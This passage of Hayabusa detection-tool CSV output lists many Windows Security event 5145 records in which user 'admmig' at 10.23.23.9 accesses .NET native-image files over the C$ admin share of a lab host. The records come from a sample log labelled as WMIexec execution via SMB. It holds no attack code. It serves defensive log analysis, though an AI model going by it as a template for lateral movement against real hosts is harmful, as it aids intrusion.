+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 : IP Address: 
